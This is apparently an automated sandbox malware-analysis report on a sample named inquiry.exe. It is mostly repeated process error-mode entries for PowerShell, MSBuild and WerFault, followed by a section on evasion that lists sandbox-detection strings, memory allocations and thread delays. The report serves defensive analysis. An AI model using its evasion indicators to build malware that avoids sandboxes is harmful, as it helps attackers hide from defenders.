                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\inquiry.exeMemory allocated: 1F869C10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory allocated: 1F86B5D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599043Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598934Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598823Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598233Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597778Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596996Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596862Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596681Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595919Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594620Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594515Jump to behavior
